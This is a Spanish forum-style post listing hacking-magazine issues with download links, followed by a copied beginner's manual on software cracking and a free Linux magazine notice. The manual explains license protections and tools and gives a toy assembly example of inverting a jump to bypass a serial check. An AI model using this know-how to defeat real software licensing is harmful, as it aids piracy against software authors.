-Visual Basic: “Arrray de controles” “vectores” “ocx”

http://rapidshare.com/files/471262/C…k_Numero_8.rar

Cuaderno 9:
-NMAP: El mejor escaneador de internet: instacion, interfaz grafica, opciones de uso
-Iniciacion al PORT SCANNING – Tecnicas de “scaneo”
-Serie RAW: IRC – Internet Relay Chat
-Chateando mediante Telnet
-GNU Linux- Permisos de archivo CAT y otros comandos
-APACHE- Modulos y servidores virtuales
-Descubre los protocolos de “la red” con nosotros
-VISUAL BASIC – Creando librerias. Acceso a datos

http://rapidshare.com/files/472735/C…mero_9.pdf.rar

Cuaderno 10:
-GNU LINUX- Gestion de usuarios, editores de texto: “VI”
-Serie Raw: Conociendo protocolos y su seguridad
-Curso de Visual Basic (V) acceso a datos II,
-XML: el futuro de la transferencia de datos
-Apache parte IV, trio de ases: APACHE- PHP- MYSQL

http://rapidshare.com/files/597702/C…ero_10.pdf.rar

Cuaderno 11:
-Programacion en GNU Linux: Bash Scripting y C
-Serie Raw: entendiendo los protocolos y su seguridad; Raw 5: FTP (File transfer protocol)
-Intrusión en redes de área local, la pesadilla de todo administrador
-Apache parte V: Configura tu servidor apache como servidor proxy
-Validacion de documentos XML: DTD primera parte: creacion de DTDS
-Curso de Visual Basic (VII) IIS Bug exploit: usando el webbrowser
-Augusta Ada Byron, Lady Lovelace (1815-1852) el primer programa

http://rapidshare.com/files/600664/C…ero_11.pdf.rar

Cuaderno 12:
-Explotando los servidores FTP:atravesando firewalls por ftp: aprende a utilizar los servidores ftp como anonimizadores!!!
-Raw 6: FTP segunda parte
-Servidor Web Apache: Protege tu apache configurandolo de forma segura: restriccion de accesos – autentificacion – analizando a nuestros visitantes – logs codificación – HTPASSWD – Cortafuegos
-Visual Studio.net: crea tu propia herramienta de cracking
-Validacion de documentos XML: DTD segunda parte, atributos y elementos
-IIS bug exploit, nuestro primer scanner
-Programacion en GNU/Linux, desarrollo de aplicaciones en entornos unix e iniciación al lenguaje C

http://rapidshare.com/files/712197/C…_Numero_12.rar

Cuaderno 13:
-Manipulación de documentos XML: El Dom, 1ª parte: teoria del Dom e intterfaz Domdocument
-Programación en GNU/Linux, desarrollo de aplicaciones en entornos unix e iniciación al lenguaje C
-Curso de Visual Basic: un cliente, una necesidad, tenemos un proyecto (parte I)
-RAW 7: HTTP (Hypertext Transfer Protocol)
-Port Scanning: Escaneando ordenadoros Remotos: tipos de scaneos

http://rapidshare.com/files/861054/C…_Numero_13.rar

Cuaderno 14:
-Curso de PHP, empezamos a programar, PHP (1)
-Serie RAW ( DNS – Domain Name System
-Curso de Visual Basic, un cliente, una necesidad, un proyecto, (parte II)
-Programación en GNU Linux, desarrollo de aplicaciones en entornos unix e iniciación al lenguaje C (III)
-Manipulacion de documentos XML: El Dom 2ª parte. Interfaz XMLDOMNODE (I)
-Tecnicas de Hijacking

http://rapidshare.com/files/1247777/…_Numero_14.rar

Cuaderno 15:
-Curso de PHP (II) Aprende a programar tu propio generador de IPs
-Serie XBOX Life, instalando Linux en una Xbox
-RAW 9: MSN (Microsoft Messenger)
-Curso de Visual Basic, Un cliente, una necesidad, un proyecto, (parte III)
-Programación en GNU Linux, desarrollo de aplicaciones en entornos unix e iniciación al lenguaje C (IV)

http://rapidshare.com/files/1253922/…_Numero_15.rar

Cuaderno 16:
-Curso PHP: Aprende a manejar ficheros con PHP
-Programación en GNU Linux, programación del sistema: El sistema I.P.C.
-Manipulación de documentos XML: El DOM tercera parte
-Serie XBOX LIFE: EVOLUTION X tu mejor amigo
-RAW 10 – NNTP (Usenet)

http://rapidshare.com/files/1258965/…_Numero_16.rar

Cuaderno 17:
-Hackeando un servidor Windows en 40 segundos!!!
-Programación en GNU Linux: programación del sistema, el sistema I.P.C (II)
-Curso de TCP/IP, introducción
-Curso de PHP, (4ª entrega) Aprende a manejar cadenas de texto en PHP
-Serie XBOX LIFE (III) Cambiando el disco duro y parcheando juegos

http://rapidshare.com/files/1263795/…_Numero_17.rar

Cuaderno 18:
-Curso de PHP, manejo de formularios web
-Serie XBOX LIFE (IV) Convirtiendo nuestra xbox en un centro multimedia
-Programación en GNU Linux, memoria compartida
-Curso de TCP/IP (2ª entrega) El protocolo de transporte UDP (protocolo de datagramas de usuario)
-El lenguaje XSL, transformacion del documento XML
-La realidad de los virus informáticos

http://rapidshare.com/files/1399584/…_Numero_18.rar

Cuaderno 19:
-Programación en Gnu Linux, colas de mensajes
-XBOX LIFE V – Jugando online gratis
-Crackeando las restricciones de seguridad de windows
-Curso de seguridad en redes – IDS
-Curso de PHP – Aprende a manejar sockets con PHP

http://rapidshare.com/files/1404999/…_Numero_19.rar

Cuaderno 20:
-Curso de PHP: Aprende a manejar sesiones
-Curso de TCP/IP (3ª entrega) TCP, 1ª parte
-XBOX LIFE VI, Menu X
-Curso de seguridad en redes – IDS (II)

http://rapidshare.com/files/1412210/…_Numero_20.rar

Cuaderno 21:
-Trabajando con bases de datos en PHP
-Curso de TCP/IP: 4ª entrega: TCP 2ª parte
-IDS, Sistema de Detección de Intrusos, tercera entrega, pluggins de salida en SNORT
-XBOX LIFE VII, Creando nuestro Slayer

http://rapidshare.com/files/1531307/…_Numero_21.rar

Cuaderno 22:
-Asaltando foros: guia paso a paso
-Firewalls: Qué son, cómo funcionan y cómo saltárselos

http://rapidshare.com/files/1537444/…ero_22.pdf.rar

Cuaderno 23:
-Cómo explotar fallos Buffer Overflow
-Curso de TCP/IP: ICMP (protocolo de mensajes de control de internet)
-Diseño de cortafuegos (parte II)

http://rapidshare.com/files/1606357/…_Numero_23.rar

Cuaderno 24:
-Los bugs y los exploits, esos pequeños bichos y diablos
-Curso de TCP/IP: La capa IP primera parte. Las direcciones IP
-Hacking de Linux
-Diseño de cortafuegos de red con iptables (3ª parte del curso de firewalls)

http://rapidshare.com/files/1610074/…_Numero_24.rar

Cuaderno 25:
-Los bugs y los exploits, esos pequeños bichos y diablos, segunda parte
-Vulnerabilidades Web, atacando la sesión de usuario
-Curso de TCP IP: La capa IP, segunda parte, (los datagramas)

http://rapidshare.com/files/1612765/…_Numero_25.rar

Cuaderno 26:
-Sombras en internet: sniffando la red – formas de detección – utilidades para la detección -ethereal: descripción. Capturando tráfico. Estableciendo filtros. Capturando información sensible. Telnet vs Secure shell
-Atacando la caché DNS
-Curso de TCP IP: La capa IP 3ª parte: fragmentación de datagramas

http://rapidshare.com/files/1617905/…_Numero_26.pdf

Cuaderno 27:
-Taller de Python “episodio 1″
-Taller de Criptografía – El sistema PGP
-Curso de TCP IP: protección con iptables, en una red corporativa
-Buffer Overflow
-Hackeando el núcleo

http://rapidshare.com/files/1628838/…_Numero_27.rar

Cuaderno 28:
-Hacking Estragegia, capitulo 1
-Curso de Python, capitulo 2
-Investigación, poniendo a prueba el antivirus
-Explotando Heap/BSS Overflows, capitulo 2
-Programación, curso de C, capitulo 1
-Taller de criptografía, capitulo 2
-La “ley de la mordaza”: informar es DELITO

http://rapidshare.com/files/1647421/…_Numero_28.rar

Cuaderno 29:
-Hacking estrategia: infiltración en una red wireless protegida
-Capitulo III: Taller de criptografía
-Control de Logs en GNU/LINUX
-Explotación de las Format Strings, capitulo III
-Shatter Attacks
-Curso de C, capitulo II
-FAQ, curiosidades de Gmail/Google

http://rapidshare.com/files/1652674/…_Numero_29.rar

Cuaderno 30:
-Taller de criptografía, capitulo IV
-Ataques a formularios web
-Los secretos del protocolo SOCKS
-Creamos una Shellcode paso a paso
-Capitulo III: Curso de C: Punteros y Arrays
-Hack mundial

http://rapidshare.com/files/1657597/…racticas.rar

todos sin pass y listos para descargar
Que disfruteis con la lectura del fascinante mundo del hacking
Salu2

Objetivos

El objetivo de este manual es que los lectores interesados puedan intruducirse a este mundo del cracking desde otro enfoque diferente al que la gente conoce. Que puedan iniciarse con un mínimo de conocimientos previos que se les brindarán en este manual.

Concepto de Cracking

Tambien recibe el nombre de Ingeniería Inversa, es la ciencia que estudia la seguridad de sistemas de protección tanto de software como de hardware con el objetivo de violarlos para aprender de ellos y obtener un beneficio personal sin fines de lucro. Podemos definirlo tambien de forma más generalizada como la acción que consiste en la modificación total o parcial de sistemas mediante alguna técnica específica para adaptarlos a las nececesidades personales de uno o bien solucionar fallas o errores de los mismos.

Breve introducción a la materia

Casi todo el mundo ve al cracking como pirateria, como algo ilegal, aunque algo de razon hay aqui si se emplea incorrectamente como en la mayoría de los casos. Se supone que toda ciencia es usada para el bien, y el cracking deberia serlo. Seria bueno que los crackers aprendan desde el principio a estudiar los sistemas de protecciones comerciales para poder crear otros nuevos con meyor seguridad o bien mejorar los existentes e implementarlos en los futuros programas en vez de andar publicando cracks en internet, por que eso sí es ilegal. Entonces podriamos decir que existen crackers buenos y malos, de los buenos por suerte hay una buena cantidad, pero tambien hay muchos de los otros que quizas muchos de ellos tienen muy malas intenciones como la creacion de virus para ocacionar daños. El buen cracker puede considerar o no como “enemigo” a estos tipo de crackers, pero a diferencia del bueno, el malo tiene como enemigo Nº1 los autores de los programas.

Quién puede ser cracker?

Es común ver que muchas personas creen ser crackers por el solo hecho de bajar un crack publicado de internet para registrar un shareware y probablemente luego venderlo. Ellos creen que esa acción es crackear, pero es un pensamiento erroneo, nosotros los crackers los vemos a ellos como verdaderos ignorantes. Entonces si ellos creen ser crackers, que queda para el autor del crack? Ambas partes se consideran complices de la pirateria lo cual no es bueno.
Una persona debe reunir ciertos requicitos y cualidades para poder ser cracker, acá muestro los mas importantes:

- Conocimientos de Software y Hardware
- Conocimientos de programacion en general
- Conocimientos básicos de Assembler (Impresindible)
- Muchas ganas e interés
- Mucha dedicación y esfuerzo
- Mucha paciencia y tiempo

Un cracker no se hace de un dia para el otro, esto puede llevar meses e iclusive años. Para ser bueno eso depende, pueden ser otros años mas, y para ser profesional… bueno, mejor cambiemos de tema.

Qué hay de las protecciones de software?

La extraordinaria cantidad de programas que han sido crackeados, la mayoría fueron los programadores quienes hicieron el sistema de protección. El resto han sido los mismos crackers quienes lo programaron, y quien mejor si no entonces? estas protecciones presentaban gran dificultad para desprotegerlos, aunque se han visto programas que son casi imposible crackearlos y solo un cracker puede hacer un sistema asi, pero como ya sabemos nada es imposible, no existe 100% seguridad. Pero igualmente con esto logramos que las empresas desarrolladoras de software contraten a un buen cracker para proteger su software. También en internet hay muchas empresas de seguridad informática que están conformadas principalmente por crackers y hackers que prestan ese tipo de servicios y venden licencias de software con sistema proteccion incluida.
Existen infinidades de maneras de proteger programas, las mas comunes de encontrar en los programa son los siguientes:

Tiempo de uso limitado:
El programa puede caducar después de un período de tiempo determinado por el programador desde la fecha de instalación si no se registra el programa. Se suele limitar a minutos, horas, dias y meses.

Cantidad de ejecuciones limitadas:
El programa caduca luego de haberlo ejecutado una cantidad determinada de veces despuás de su instalacion si no se registra.

Numero de serie:
Esto es lo mas comun encontrar, existen de dos tipos, números de serie fijos o variables, éste ultimo se genera en la mayoria de los casos en base a algo, como por ejemplo en funcion del nombre de usuario, organizacion, etc. de esta manera se consigue un serial diferente y único para cada cliente o usuario. Pero también se suelen generar en función al nombre de la PC, del número de serie de disco o de algun otro componente del equipo. Y por último tenemos los números aleatorios, éstos son los más dificiles de crackear.

Mensajes molestos y/o nags:
Esto tambien es bastante común, son ventanas que pueden aparecer al inicio del programa o al final, o en alguna accion por parte del usuario en donde informa que se encuentra ante una copia no registrada o algun otro mensaje relacionado a la protección. Estos mensajes desaparecen al registrar.

Funciones desabilitadas:
Esto le dá a un shareware una escencia de que estamos ante una Demo pero no lo es en absoluto, generalmente deshabilitan funciones importantes de la aplicación, como por ejemplo: abrir, guardar, importar, exportar, imprimir, grabar, etc. Cuando registramos se habilitan todas.

CD-ROM:
Esta es la mas usada por los videos juegos. Debemos insertar el disco para poder jugarlos. Aveces hay juegos que están completamente instalados en el disco rigido pero nada más por seguridad nos piden el CD, otros realmente requieren archivos del mismo para su funcionamiento.

Archivos llave:
Es algo parecido al anterior pero funcionan de muchas formas diferentes dependendiendo de las habilidades del programador.

Anti-herramientas cracking:
Estas son muy efectivas si se utilizan técnicas novedosas o desconocidas para los crackers. Se pueden aplicar anti-depurador , anti-desensamblador, anti-monitores de registros o archivos, api, etc. Tambien anti-modificacion del ejecutable que seria algo como anti-editores hexadecimales.

Ejecutable comprimido y/o encriptado:
Esto también es muy efectivo si no se usan técnicas genericas. Por ejemplo con la compresion logramos disminuir el tamaño del ejecutable impidiendo que pueda ser desensamblado y también ocurre lo mismo con la encriptación. Pero tiene sus desventajas, con un depurador podemos ver el codigo en memoria ya descomprimido o desencriptado y se puede trabajar sobre él. Hay programas genericos que permiten descomprimir o desencriptar ejecutables para dejarlos tal y como lo vemos en memoria para poder aplicar parches.

Qué herramientas se utilizan?

Para crackear no se necesitan tantas herramientas, pero las hay segun sea el caso, a continuación nombraré y describiré las principales:

Depurador:
(En inglés Debugger) Es un programa que en realidad ha sido creado para solucionar errores o bugs de otros programas. Permite ver instrucción por instrucción en assembler que ejecuta el microprocesador en memoria durante la ejecución del programa y además nos permite poner puntos de parada (BreackPoints) en cualquier parte del código durante la ejecución. Podemos editar en forma temporal la memoria, los registros y las instrucciones para alterar su comportamiento. Ejemplo: SoftICE, TRW2000.

Desensamblador:
(En inglés Disassembler) Es un programa que nos permite ver el código de un ejecutable en assembler e interactuar con él. Podemos ver referencias de texto, menúes y cuadros de dialogo, funciones importadas y exportadas del programa desensamblado. Ejemplo: W32Asm, IdaPro.

Editor Hexadecimal:
Con este programa podemos editar los bytes en hexadecimal de las instrucciones de cualquier ejecutable o archivo. Con esto hacemos los parches. Ejemplo: UltraEdit, Hview, HexWorkshop, etc.

Monitor de Archivos:
Este programa se encarga de mostrarnos secuencialmente en tiempo real los archivos que estan siendo manejados con operaciones de entrada y salida (I/O) y por que programa esta siendo utilizado. Ejemplo: FileMon.

Monitor de Registro:
Este programa es similar al anterior con la diferencia de que se refiere al registro de Windows. Ejemplo: RegMon.

Monitor de Funciones API:
Este otro programa también es similar a los anteriores, nos permite espiar las funciones API utilizadas por un determinado programa en tiempo de ejecucion. Ejemplo: APIS32.

Descompresor:
Es un programa que sirve para descomprimir ejecutables comprimidos por algun compresor. Ejemplo: ProcDump.
Todas las herramientas se pueden encontrar en internet pero como toda herramienta antes de usarla por primera vez, debemos aprender a utilizarlas correctamente, hay cientos de manuales dedicados a las mas importantes, sobre todo el SoftICE que es muy dificil entenderlo. Como ya se habran dado cuenta necesitamos tener conocimientos de assembler para utilizarlas, por lo tanto busquense un buen manual para aprender.

Un pequño ejemplo práctico

Un programa es un conjunto de instrucciones que al ejecutarlo se cargan en memoria y éstas son ejecutadas una por una por el microprocesador. Muchas instrucciones impiden que se ejecuten otras como las instrucciones condicionales. Citaré un ejemplo un shareware cualquiera que hay que registrar por con un número de serie generado en base al nombre, si no introducimos el número correcto nos mostrará un mensaje de registración incorrecta. Qué ocurre en las instrucciones? Lo que aquí sucede es que hemos entrado a las rutinas de comprobación del serial del programa, que compara nuestro número de serie introducido con el número correcto, si son distintos muestra el mensaje de error y si son iguales nos muestra el de felicitacion y registra el programa. Saber assembler es fundamental para el crackeo, es un lenguaje de bajo nivel y practicamente el mas dificil de aprender. Ahora observaremos un pequeño ejemplo del algoritmo que hablamos representado en dicho lenguaje:

0001 push eax <- Almacena nuestro número en el registro EAX
0002 mov ecx, 0123 <- Mueve el serial correcto al registro ECX
0004 cmp eax,ecx <- Compara nuestro serial con el verdadero
0005 jne 0008 <- Si son distintos nos muestra mensaje de error

Este sistema es uno de los mas sencillos y faciles de crackear que nos podemos encontrar, aunque casi no quedan de esos. Para crackearlo es muy facil, se pueden modificar varias cosas, pero normalmente se acostumbra a invertir el salto condicional JNE que salta a la direccion 0008 donde esta el mensaje de error si EAX y ECX no son iguales, por el salto JE que salta si son iguales para que continue ejecutandose la siguiente linea y con esto cuando registremos el programa, nos aceptará cualquier número de serie como válido, salvo que pongamos el serial real.

Palabras finales

Con esto ya concluimos con este manual. La teoria necesaria para el cracking propiamente dicho merecen tutoriales especificos para temas en particular. Para los que se quieren iniciar, como ya he dicho, deben como primera medida aprender lo básico de assembler, aprender a usar las herramientas y luego leer tutoriales prácticos de crackeo para despues comenzar a practicar. Esas serían las pautas organizadas para que una persona se forme como cracker. Pero siempre recomiendo leer muchos manuales y tutoriales, muchisima práctica y entusiasmo si de verdad queres progresar.

[Texto sacado de portalhacker]

El link es el siguiente : http://www.tuxinfo.com.ar/tuxinfo/?p=1

Ya van por el numero 6 aunquepueden descargar los numero antiguos en la misma web.

Un articulo del admin de la web sobre la 6 revista.

Bienvenidos a TuxInfo “Número 6″. Como todos los meses comienzo agradeciendo a todos ustedes por leernos mes a mes, a los colaboradores ya que sin ellos no se podría tener tanto contenido y de tan buena calidad, a nuestro corrector, y por supuesto a nuestra diseñadora quien intenta poner orden a todo el material y plasmarlo en una revista gratuita de excelente calidad como lo es TuxInfo.
Ahora vayamos a explicar un poco lo que encontrarán en las páginas de esta edición, la nota de tapa está dirigida a la cobertura que realizamos en conjunto con mucha gente dispersa por el Flisol 2008 en toda Latino América, así es, contactamos a todos los organizadores del Flisol y gracias a eso es que podemos realizar un informe no solo local.
Este mes también teníamos en mente ingresar como nota de tapa una review de Ubuntu 8.04 Hardy Heron, pero creímos que el Flisol 2008 era merecedor de la sección, de cualquier manera no dejen de leer la nota dedicada a Ubuntu ya que la misma tiene la estructura de tapa.
Y como siempre encontrarán las secciones clásicas, como juegos, programación con su 5º edición del curso de C, una nota imperdible de Trac de la mano de nuestro nuevo colaborador Estevan Saavedra desde Bolivia, una nota de seguridad bajo squid, una review de Sabayon Linux, una primer entrega de Openoffice, y más.
Los agradecimientos de siempre no podían faltar.

Espero que les guste

Un saludo.